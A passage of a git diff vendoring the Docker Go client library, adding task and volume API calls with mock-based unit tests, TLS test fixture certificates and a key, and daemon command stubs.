ioutil.ReadAll(serverResp.body) + if err != nil { + return swarm.Task{}, nil, err + } + + var response swarm.Task + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&response) + return response, body, err +} diff --git a/vendor/github.com/docker/docker/client/task_inspect_test.go b/vendor/github.com/docker/docker/client/task_inspect_test.go new file mode 100644 index 0000000000..148cdad3a7 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_inspect_test.go @@ -0,0 +1,54 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestTaskInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, _, err := client.TaskInspectWithRaw(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestTaskInspect(t *testing.T) { + expectedURL := "/tasks/task_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + content, err := json.Marshal(swarm.Task{ + ID: "task_id", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + taskInspect, _, err := client.TaskInspectWithRaw(context.Background(), "task_id") + if err != nil { + t.Fatal(err) + } + if taskInspect.ID != "task_id" { + t.Fatalf("expected `task_id`, got %s", taskInspect.ID) + } +} diff --git a/vendor/github.com/docker/docker/client/task_list.go b/vendor/github.com/docker/docker/client/task_list.go new file mode 100644 index 0000000000..66324da959 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_list.go @@ -0,0 +1,35 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +// TaskList returns the list of tasks. +func (cli *Client) TaskList(ctx context.Context, options types.TaskListOptions) ([]swarm.Task, error) { + query := url.Values{} + + if options.Filters.Len() > 0 { + filterJSON, err := filters.ToParam(options.Filters) + if err != nil { + return nil, err + } + + query.Set("filters", filterJSON) + } + + resp, err := cli.get(ctx, "/tasks", query, nil) + if err != nil { + return nil, err + } + + var tasks []swarm.Task + err = json.NewDecoder(resp.body).Decode(&tasks) + ensureReaderClosed(resp) + return tasks, err +} diff --git a/vendor/github.com/docker/docker/client/task_list_test.go b/vendor/github.com/docker/docker/client/task_list_test.go new file mode 100644 index 0000000000..2a9a4c4346 --- /dev/null +++ b/vendor/github.com/docker/docker/client/task_list_test.go @@ -0,0 +1,94 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "golang.org/x/net/context" +) + +func TestTaskListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.TaskList(context.Background(), types.TaskListOptions{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestTaskList(t *testing.T) { + expectedURL := "/tasks" + + filters := filters.NewArgs() + filters.Add("label", "label1") + filters.Add("label", "label2") + + listCases := []struct { + options types.TaskListOptions + expectedQueryParams map[string]string + }{ + { + options: types.TaskListOptions{}, + expectedQueryParams: map[string]string{ + "filters": "", + }, + }, + { + options: types.TaskListOptions{ + Filters: filters, + }, + expectedQueryParams: map[string]string{ + "filters": `{"label":{"label1":true,"label2":true}}`, + }, + }, + } + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + for key, expected := range listCase.expectedQueryParams { + actual := query.Get(key) + if actual != expected { + return nil, fmt.Errorf("%s not set in URL query properly. Expected '%s', got %s", key, expected, actual) + } + } + content, err := json.Marshal([]swarm.Task{ + { + ID: "task_id1", + }, + { + ID: "task_id2", + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + tasks, err := client.TaskList(context.Background(), listCase.options) + if err != nil { + t.Fatal(err) + } + if len(tasks) != 2 { + t.Fatalf("expected 2 tasks, got %v", tasks) + } + } +} diff --git a/vendor/github.com/docker/docker/client/testdata/ca.pem b/vendor/github.com/docker/docker/client/testdata/ca.pem new file mode 100644 index 0000000000..ad14d47065 --- /dev/null +++ b/vendor/github.com/docker/docker/client/testdata/ca.pem @@ -0,0 +1,18 @@ +-----BEGIN CERTIFICATE----- +MIIC0jCCAbqgAwIBAgIRAILlP5WWLaHkQ/m2ASHP7SowDQYJKoZIhvcNAQELBQAw +EjEQMA4GA1UEChMHdmluY2VudDAeFw0xNjAzMjQxMDE5MDBaFw0xOTAzMDkxMDE5 +MDBaMBIxEDAOBgNVBAoTB3ZpbmNlbnQwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAw +ggEKAoIBAQD0yZPKAGncoaxaU/QW9tWEHbrvDoGVF/65L8Si/jBrlAgLjhmmV1di +vKG9QPzuU8snxHro3/uCwyA6kTqw0U8bGwHxJq2Bpa6JBYj8N2jMJ+M+sjXgSo2t +E0zIzjTW2Pir3C8qwfrVL6NFp9xClwMD23SFZ0UsEH36NkfyrKBVeM8IOjJd4Wjs +xIcuvF3BTVkji84IJBW2JIKf9ZrzJwUlSCPgptRp4Evdbyp5d+UPxtwxD7qjW4lM +yQQ8vfcC4lKkVx5s/RNJ4fzd5uEgLdEbZ20qt7Zt/bLcxFHpUhH2teA0QjmrOWFh +gbL83s95/+hbSVhsO4hoFW7vTeiCCY4xAgMBAAGjIzAhMA4GA1UdDwEB/wQEAwIC +rDAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3DQEBCwUAA4IBAQBY51RHajuDuhO2 +tcm26jeNROzfffnjhvbOVPjSEdo9vI3JpMU/RuQw+nbNcLwJrdjL6UH7tD/36Y+q +NXH+xSIjWFH0zXGxrIUsVrvt6f8CbOvw7vD+gygOG+849PDQMbL6czP8rvXY7vZV +9pdpQfrENk4b5kePRW/6HaGSTvtgN7XOrYD9fp3pm/G534T2e3IxgYMRNwdB9Ul9 +bLwMqQqf4eiqqMs6x4IVmZUkGVMKiFKcvkNg9a+Ozx5pMizHeAezWMcZ5V+QJZVT +8lElSCKZ2Yy2xkcl7aeQMLwcAeZwfTp+Yu9dVzlqXiiBTLd1+LtAQCuKHzmw4Q8k +EvD5m49l +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/client/testdata/cert.pem b/vendor/github.com/docker/docker/client/testdata/cert.pem new file mode 100644 index 0000000000..9000ffb32b --- /dev/null +++ b/vendor/github.com/docker/docker/client/testdata/cert.pem @@ -0,0 +1,18 @@ +-----BEGIN CERTIFICATE----- +MIIC8DCCAdigAwIBAgIRAJAS1glgcke4q7eCaretwgUwDQYJKoZIhvcNAQELBQAw +EjEQMA4GA1UEChMHdmluY2VudDAeFw0xNjAzMjQxMDE5MDBaFw0xOTAzMDkxMDE5 +MDBaMB4xHDAaBgNVBAoME3ZpbmNlbnQuPGJvb3RzdHJhcD4wggEiMA0GCSqGSIb3 +DQEBAQUAA4IBDwAwggEKAoIBAQClpvG442dGEvrRgmCrqY4kBml1LVlw2Y7ZDn6B +TKa52+MuGDmfXbO1UhclNqTXjLgAwKjPz/OvnPRxNEUoQEDbBd+Xev7rxTY5TvYI +27YH3fMH2LL2j62jum649abfhZ6ekD5eD8tCn3mnrEOgqRIlK7efPIVixq/ZqU1H +7ez0ggB7dmWHlhnUaxyQOCSnAX/7nKYQXqZgVvGhDeR2jp7GcnhbK/qPrZ/mOm83 +2IjCeYN145opYlzTSp64GYIZz7uqMNcnDKK37ZbS8MYcTjrRaHEiqZVVdIC+ghbx +qYqzbZRVfgztI9jwmifn0mYrN4yt+nhNYwBcRJ4Pv3uLFbo7AgMBAAGjNTAzMA4G +A1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAjAMBgNVHRMBAf8EAjAA +MA0GCSqGSIb3DQEBCwUAA4IBAQDg1r7nksjYgDFYEcBbrRrRHddIoK+RVmSBTTrq +8giC77m0srKdh9XTVWK1PUbGfODV1oD8m9QhPE8zPDyYQ8jeXNRSU5wXdkrTRmmY +w/T3SREqmE7CObMtusokHidjYFuqqCR07sJzqBKRlzr3o0EGe3tuEhUlF5ARY028 +eipaDcVlT5ChGcDa6LeJ4e05u4cVap0dd6Rp1w3Rx1AYAecdgtgBMnw1iWdl/nrC +sp26ZXNaAhFOUovlY9VY257AMd9hQV7WvAK4yNEHcckVu3uXTBmDgNSOPtl0QLsL +Kjlj75ksCx8nCln/hCut/0+kGTsGZqdV5c6ktgcGYRir/5Hs +-----END CERTIFICATE----- diff --git a/vendor/github.com/docker/docker/client/testdata/key.pem b/vendor/github.com/docker/docker/client/testdata/key.pem new file mode 100644 index 0000000000..c0869dfc1a --- /dev/null +++ b/vendor/github.com/docker/docker/client/testdata/key.pem @@ -0,0 +1,27 @@ +-----BEGIN RSA PRIVATE KEY----- +MIIEowIBAAKCAQEApabxuONnRhL60YJgq6mOJAZpdS1ZcNmO2Q5+gUymudvjLhg5 +n12ztVIXJTak14y4AMCoz8/zr5z0cTRFKEBA2wXfl3r+68U2OU72CNu2B93zB9iy +9o+to7puuPWm34WenpA+Xg/LQp95p6xDoKkSJSu3nzyFYsav2alNR+3s9IIAe3Zl +h5YZ1GsckDgkpwF/+5ymEF6mYFbxoQ3kdo6exnJ4Wyv6j62f5jpvN9iIwnmDdeOa +KWJc00qeuBmCGc+7qjDXJwyit+2W0vDGHE460WhxIqmVVXSAvoIW8amKs22UVX4M +7SPY8Jon59JmKzeMrfp4TWMAXESeD797ixW6OwIDAQABAoIBAHfyAAleL8NfrtnR +S+pApbmUIvxD0AWUooispBE/zWG6xC72P5MTqDJctIGvpYCmVf3Fgvamns7EGYN2 +07Sngc6V3Ca1WqyhaffpIuGbJZ1gqr89u6gotRRexBmNVj13ZTlvPJmjWgxtqQsu +AvHsOkVL+HOGwRaaw24Z1umEcBVCepl7PGTqsLeJUtBUZBiqdJTu4JYLAB6BggBI +OxhHoTWvlNWwzezo2C/IXkXcXD/tp3i5vTn5rAXHSMQkdMAUh7/xJ73Fl36gxZhp +W7NoPKaS9qNh8jhs6p54S7tInb6+mrKtvRFKl5XAR3istXrXteT5UaukpuBbQ/5d +qf4BXuECgYEAzoOKxMee5tG/G9iC6ImNq5xGAZm0OnmteNgIEQj49If1Q68av525 +FioqdC9zV+blfHQqXEIUeum4JAou4xqmB8Lw2H0lYwOJ1IkpUy3QJjU1IrI+U5Qy +ryZuA9cxSTLf1AJFbROsoZDpjaBh0uUQkD/4PHpwXMgHu/3CaJ4nTEkCgYEAzVjE +VWgczWJGyRxmHSeR51ft1jrlChZHEd3HwgLfo854JIj+MGUH4KPLSMIkYNuyiwNQ +W7zdXCB47U8afSL/lPTv1M5+ZsWY6sZAT6gtp/IeU0Va943h9cj10fAOBJaz1H6M +jnZS4jjWhVInE7wpCDVCwDRoHHJ84kb6JeflamMCgYBDQDcKie9HP3q6uLE4xMKr +5gIuNz2n5UQGnGNUGNXp2/SVDArr55MEksqsd19aesi01KeOz74XoNDke6R1NJJo +6KTB+08XhWl3GwuoGL02FBGvsNf3I8W1oBAnlAZqzfRx+CNfuA55ttU318jDgvD3 +6L0QBNdef411PNf4dbhacQKBgAd/e0PHFm4lbYJAaDYeUMSKwGN3KQ/SOmwblgSu +iC36BwcGfYmU1tHMCUsx05Q50W4kA9Ylskt/4AqCPexdz8lHnE4/7/uesXO5I3YF +JQ2h2Jufx6+MXbjUyq0Mv+ZI/m3+5PD6vxIFk0ew9T5SO4lSMIrGHxsSzx6QCuhB +bG4TAoGBAJ5PWG7d2CyCjLtfF8J4NxykRvIQ8l/3kDvDdNrXiXbgonojo2lgRYaM +5LoK9ApN8KHdedpTRipBaDA22Sp5SjMcUE7A6q42PJCL9r+BRYF0foFQx/rqpCff +pVWKgwIPoKnfxDqN1RUgyFcx1jbA3XVJZCuT+wbMuDQ9nlvulD1W +-----END RSA PRIVATE KEY----- diff --git a/vendor/github.com/docker/docker/client/transport.go b/vendor/github.com/docker/docker/client/transport.go new file mode 100644 index 0000000000..f04e601649 --- /dev/null +++ b/vendor/github.com/docker/docker/client/transport.go @@ -0,0 +1,28 @@ +package client + +import ( + "crypto/tls" + "errors" + "net/http" +) + +var errTLSConfigUnavailable = errors.New("TLSConfig unavailable") + +// transportFunc allows us to inject a mock transport for testing. We define it +// here so we can detect the tlsconfig and return nil for only this type. +type transportFunc func(*http.Request) (*http.Response, error) + +func (tf transportFunc) RoundTrip(req *http.Request) (*http.Response, error) { + return tf(req) +} + +// resolveTLSConfig attempts to resolve the tls configuration from the +// RoundTripper. +func resolveTLSConfig(transport http.RoundTripper) *tls.Config { + switch tr := transport.(type) { + case *http.Transport: + return tr.TLSClientConfig + default: + return nil + } +} diff --git a/vendor/github.com/docker/docker/client/utils.go b/vendor/github.com/docker/docker/client/utils.go new file mode 100644 index 0000000000..23d520ecb8 --- /dev/null +++ b/vendor/github.com/docker/docker/client/utils.go @@ -0,0 +1,33 @@ +package client + +import ( + "github.com/docker/docker/api/types/filters" + "net/url" + "regexp" +) + +var headerRegexp = regexp.MustCompile(`\ADocker/.+\s\((.+)\)\z`) + +// getDockerOS returns the operating system based on the server header from the daemon. +func getDockerOS(serverHeader string) string { + var osType string + matches := headerRegexp.FindStringSubmatch(serverHeader) + if len(matches) > 0 { + osType = matches[1] + } + return osType +} + +// getFiltersQuery returns a url query with "filters" query term, based on the +// filters provided. +func getFiltersQuery(f filters.Args) (url.Values, error) { + query := url.Values{} + if f.Len() > 0 { + filterJSON, err := filters.ToParam(f) + if err != nil { + return query, err + } + query.Set("filters", filterJSON) + } + return query, nil +} diff --git a/vendor/github.com/docker/docker/client/version.go b/vendor/github.com/docker/docker/client/version.go new file mode 100644 index 0000000000..933ceb4a49 --- /dev/null +++ b/vendor/github.com/docker/docker/client/version.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// ServerVersion returns information of the docker client and server host. +func (cli *Client) ServerVersion(ctx context.Context) (types.Version, error) { + resp, err := cli.get(ctx, "/version", nil, nil) + if err != nil { + return types.Version{}, err + } + + var server types.Version + err = json.NewDecoder(resp.body).Decode(&server) + ensureReaderClosed(resp) + return server, err +} diff --git a/vendor/github.com/docker/docker/client/volume_create.go b/vendor/github.com/docker/docker/client/volume_create.go new file mode 100644 index 0000000000..9620c87cbf --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_create.go @@ -0,0 +1,21 @@ +package client + +import ( + "encoding/json" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +// VolumeCreate creates a volume in the docker host. +func (cli *Client) VolumeCreate(ctx context.Context, options volumetypes.VolumesCreateBody) (types.Volume, error) { + var volume types.Volume + resp, err := cli.post(ctx, "/volumes/create", nil, options, nil) + if err != nil { + return volume, err + } + err = json.NewDecoder(resp.body).Decode(&volume) + ensureReaderClosed(resp) + return volume, err +} diff --git a/vendor/github.com/docker/docker/client/volume_create_test.go b/vendor/github.com/docker/docker/client/volume_create_test.go new file mode 100644 index 0000000000..9f1b2540b5 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_create_test.go @@ -0,0 +1,75 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +func TestVolumeCreateError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{}) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeCreate(t *testing.T) { + expectedURL := "/volumes/create" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + + if req.Method != "POST" { + return nil, fmt.Errorf("expected POST method, got %s", req.Method) + } + + content, err := json.Marshal(types.Volume{ + Name: "volume", + Driver: "local", + Mountpoint: "mountpoint", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + volume, err := client.VolumeCreate(context.Background(), volumetypes.VolumesCreateBody{ + Name: "myvolume", + Driver: "mydriver", + DriverOpts: map[string]string{ + "opt-key": "opt-value", + }, + }) + if err != nil { + t.Fatal(err) + } + if volume.Name != "volume" { + t.Fatalf("expected volume.Name to be 'volume', got %s", volume.Name) + } + if volume.Driver != "local" { + t.Fatalf("expected volume.Driver to be 'local', got %s", volume.Driver) + } + if volume.Mountpoint != "mountpoint" { + t.Fatalf("expected volume.Mountpoint to be 'mountpoint', got %s", volume.Mountpoint) + } +} diff --git a/vendor/github.com/docker/docker/client/volume_inspect.go b/vendor/github.com/docker/docker/client/volume_inspect.go new file mode 100644 index 0000000000..3860e9b22c --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_inspect.go @@ -0,0 +1,38 @@ +package client + +import ( + "bytes" + "encoding/json" + "io/ioutil" + "net/http" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +// VolumeInspect returns the information about a specific volume in the docker host. +func (cli *Client) VolumeInspect(ctx context.Context, volumeID string) (types.Volume, error) { + volume, _, err := cli.VolumeInspectWithRaw(ctx, volumeID) + return volume, err +} + +// VolumeInspectWithRaw returns the information about a specific volume in the docker host and its raw representation +func (cli *Client) VolumeInspectWithRaw(ctx context.Context, volumeID string) (types.Volume, []byte, error) { + var volume types.Volume + resp, err := cli.get(ctx, "/volumes/"+volumeID, nil, nil) + if err != nil { + if resp.statusCode == http.StatusNotFound { + return volume, nil, volumeNotFoundError{volumeID} + } + return volume, nil, err + } + defer ensureReaderClosed(resp) + + body, err := ioutil.ReadAll(resp.body) + if err != nil { + return volume, nil, err + } + rdr := bytes.NewReader(body) + err = json.NewDecoder(rdr).Decode(&volume) + return volume, body, err +} diff --git a/vendor/github.com/docker/docker/client/volume_inspect_test.go b/vendor/github.com/docker/docker/client/volume_inspect_test.go new file mode 100644 index 0000000000..0d1d118828 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_inspect_test.go @@ -0,0 +1,76 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "golang.org/x/net/context" +) + +func TestVolumeInspectError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.VolumeInspect(context.Background(), "nothing") + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeInspectNotFound(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusNotFound, "Server error")), + } + + _, err := client.VolumeInspect(context.Background(), "unknown") + if err == nil || !IsErrVolumeNotFound(err) { + t.Fatalf("expected a volumeNotFound error, got %v", err) + } +} + +func TestVolumeInspect(t *testing.T) { + expectedURL := "/volumes/volume_id" + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "GET" { + return nil, fmt.Errorf("expected GET method, got %s", req.Method) + } + content, err := json.Marshal(types.Volume{ + Name: "name", + Driver: "driver", + Mountpoint: "mountpoint", + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + v, err := client.VolumeInspect(context.Background(), "volume_id") + if err != nil { + t.Fatal(err) + } + if v.Name != "name" { + t.Fatalf("expected `name`, got %s", v.Name) + } + if v.Driver != "driver" { + t.Fatalf("expected `driver`, got %s", v.Driver) + } + if v.Mountpoint != "mountpoint" { + t.Fatalf("expected `mountpoint`, got %s", v.Mountpoint) + } +} diff --git a/vendor/github.com/docker/docker/client/volume_list.go b/vendor/github.com/docker/docker/client/volume_list.go new file mode 100644 index 0000000000..32247ce115 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_list.go @@ -0,0 +1,32 @@ +package client + +import ( + "encoding/json" + "net/url" + + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +// VolumeList returns the volumes configured in the docker host. +func (cli *Client) VolumeList(ctx context.Context, filter filters.Args) (volumetypes.VolumesListOKBody, error) { + var volumes volumetypes.VolumesListOKBody + query := url.Values{} + + if filter.Len() > 0 { + filterJSON, err := filters.ToParamWithVersion(cli.version, filter) + if err != nil { + return volumes, err + } + query.Set("filters", filterJSON) + } + resp, err := cli.get(ctx, "/volumes", query, nil) + if err != nil { + return volumes, err + } + + err = json.NewDecoder(resp.body).Decode(&volumes) + ensureReaderClosed(resp) + return volumes, err +} diff --git a/vendor/github.com/docker/docker/client/volume_list_test.go b/vendor/github.com/docker/docker/client/volume_list_test.go new file mode 100644 index 0000000000..f29639be23 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_list_test.go @@ -0,0 +1,98 @@ +package client + +import ( + "bytes" + "encoding/json" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + volumetypes "github.com/docker/docker/api/types/volume" + "golang.org/x/net/context" +) + +func TestVolumeListError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + _, err := client.VolumeList(context.Background(), filters.NewArgs()) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeList(t *testing.T) { + expectedURL := "/volumes" + + noDanglingFilters := filters.NewArgs() + noDanglingFilters.Add("dangling", "false") + + danglingFilters := filters.NewArgs() + danglingFilters.Add("dangling", "true") + + labelFilters := filters.NewArgs() + labelFilters.Add("label", "label1") + labelFilters.Add("label", "label2") + + listCases := []struct { + filters filters.Args + expectedFilters string + }{ + { + filters: filters.NewArgs(), + expectedFilters: "", + }, { + filters: noDanglingFilters, + expectedFilters: `{"dangling":{"false":true}}`, + }, { + filters: danglingFilters, + expectedFilters: `{"dangling":{"true":true}}`, + }, { + filters: labelFilters, + expectedFilters: `{"label":{"label1":true,"label2":true}}`, + }, + } + + for _, listCase := range listCases { + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + query := req.URL.Query() + actualFilters := query.Get("filters") + if actualFilters != listCase.expectedFilters { + return nil, fmt.Errorf("filters not set in URL query properly. Expected '%s', got %s", listCase.expectedFilters, actualFilters) + } + content, err := json.Marshal(volumetypes.VolumesListOKBody{ + Volumes: []*types.Volume{ + { + Name: "volume", + Driver: "local", + }, + }, + }) + if err != nil { + return nil, err + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader(content)), + }, nil + }), + } + + volumeResponse, err := client.VolumeList(context.Background(), listCase.filters) + if err != nil { + t.Fatal(err) + } + if len(volumeResponse.Volumes) != 1 { + t.Fatalf("expected 1 volume, got %v", volumeResponse.Volumes) + } + } +} diff --git a/vendor/github.com/docker/docker/client/volume_prune.go b/vendor/github.com/docker/docker/client/volume_prune.go new file mode 100644 index 0000000000..a07e4ce637 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_prune.go @@ -0,0 +1,36 @@ +package client + +import ( + "encoding/json" + "fmt" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "golang.org/x/net/context" +) + +// VolumesPrune requests the daemon to delete unused data +func (cli *Client) VolumesPrune(ctx context.Context, pruneFilters filters.Args) (types.VolumesPruneReport, error) { + var report types.VolumesPruneReport + + if err := cli.NewVersionError("1.25", "volume prune"); err != nil { + return report, err + } + + query, err := getFiltersQuery(pruneFilters) + if err != nil { + return report, err + } + + serverResp, err := cli.post(ctx, "/volumes/prune", query, nil, nil) + if err != nil { + return report, err + } + defer ensureReaderClosed(serverResp) + + if err := json.NewDecoder(serverResp.body).Decode(&report); err != nil { + return report, fmt.Errorf("Error retrieving disk usage: %v", err) + } + + return report, nil +} diff --git a/vendor/github.com/docker/docker/client/volume_remove.go b/vendor/github.com/docker/docker/client/volume_remove.go new file mode 100644 index 0000000000..6c26575b49 --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_remove.go @@ -0,0 +1,21 @@ +package client + +import ( + "net/url" + + "github.com/docker/docker/api/types/versions" + "golang.org/x/net/context" +) + +// VolumeRemove removes a volume from the docker host. +func (cli *Client) VolumeRemove(ctx context.Context, volumeID string, force bool) error { + query := url.Values{} + if versions.GreaterThanOrEqualTo(cli.version, "1.25") { + if force { + query.Set("force", "1") + } + } + resp, err := cli.delete(ctx, "/volumes/"+volumeID, query, nil) + ensureReaderClosed(resp) + return err +} diff --git a/vendor/github.com/docker/docker/client/volume_remove_test.go b/vendor/github.com/docker/docker/client/volume_remove_test.go new file mode 100644 index 0000000000..1fe657349a --- /dev/null +++ b/vendor/github.com/docker/docker/client/volume_remove_test.go @@ -0,0 +1,47 @@ +package client + +import ( + "bytes" + "fmt" + "io/ioutil" + "net/http" + "strings" + "testing" + + "golang.org/x/net/context" +) + +func TestVolumeRemoveError(t *testing.T) { + client := &Client{ + client: newMockClient(errorMock(http.StatusInternalServerError, "Server error")), + } + + err := client.VolumeRemove(context.Background(), "volume_id", false) + if err == nil || err.Error() != "Error response from daemon: Server error" { + t.Fatalf("expected a Server Error, got %v", err) + } +} + +func TestVolumeRemove(t *testing.T) { + expectedURL := "/volumes/volume_id" + + client := &Client{ + client: newMockClient(func(req *http.Request) (*http.Response, error) { + if !strings.HasPrefix(req.URL.Path, expectedURL) { + return nil, fmt.Errorf("Expected URL '%s', got '%s'", expectedURL, req.URL) + } + if req.Method != "DELETE" { + return nil, fmt.Errorf("expected DELETE method, got %s", req.Method) + } + return &http.Response{ + StatusCode: http.StatusOK, + Body: ioutil.NopCloser(bytes.NewReader([]byte("body"))), + }, nil + }), + } + + err := client.VolumeRemove(context.Background(), "volume_id", false) + if err != nil { + t.Fatal(err) + } +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go new file mode 100644 index 0000000000..65f9f37be2 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_none.go @@ -0,0 +1,27 @@ +// +build !daemon + +package main + +import ( + "fmt" + "runtime" + "strings" + + "github.com/spf13/cobra" +) + +func newDaemonCommand() *cobra.Command { + return &cobra.Command{ + Use: "daemon", + Hidden: true, + RunE: func(cmd *cobra.Command, args []string) error { + return runDaemon() + }, + } +} + +func runDaemon() error { + return fmt.Errorf( + "`docker daemon` is not supported on %s. Please run `dockerd` directly", + strings.Title(runtime.GOOS)) +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go new file mode 100644 index 0000000000..32032fe1b3 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_none_test.go @@ -0,0 +1,17 @@ +// +build !daemon + +package main + +import ( + "testing" + + "github.com/docker/docker/pkg/testutil/assert" +) + +func TestDaemonCommand(t *testing.T) { + cmd := newDaemonCommand() + cmd.SetArgs([]string{"--help"}) + err := cmd.Execute() + + assert.Error(t, err, "Please run `dockerd`") +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go new file mode 100644 index 0000000000..26348a8843 --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_unit_test.go @@ -0,0 +1,30 @@ +// +build daemon + +package main + +import ( + "testing" + + "github.com/docker/docker/pkg/testutil/assert" + "github.com/spf13/cobra" +) + +func stubRun(cmd *cobra.Command, args []string) error { + return nil +} + +func TestDaemonCommandHelp(t *testing.T) { + cmd := newDaemonCommand() + cmd.RunE = stubRun + cmd.SetArgs([]string{"--help"}) + err := cmd.Execute() + assert.NilError(t, err) +} + +func TestDaemonCommand(t *testing.T) { + cmd := newDaemonCommand() + cmd.RunE = stubRun + cmd.SetArgs([]string{"--containerd", "/foo"}) + err := cmd.Execute() + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go new file mode 100644 index 0000000000..f68d220c2f --- /dev/null +++ b/vendor/github.com/docker/docker/cmd/docker/daemon_unix.go @@ -0,0 +1,79 @@ +// +build daemon + +package main + +import ( + "fmt" + + "os" + "os/exec" + "path/filepath" + "syscall" + + "github.com/spf13/cobra" +) + +const daemonBinary = "dockerd" + +func newDaemonCommand() 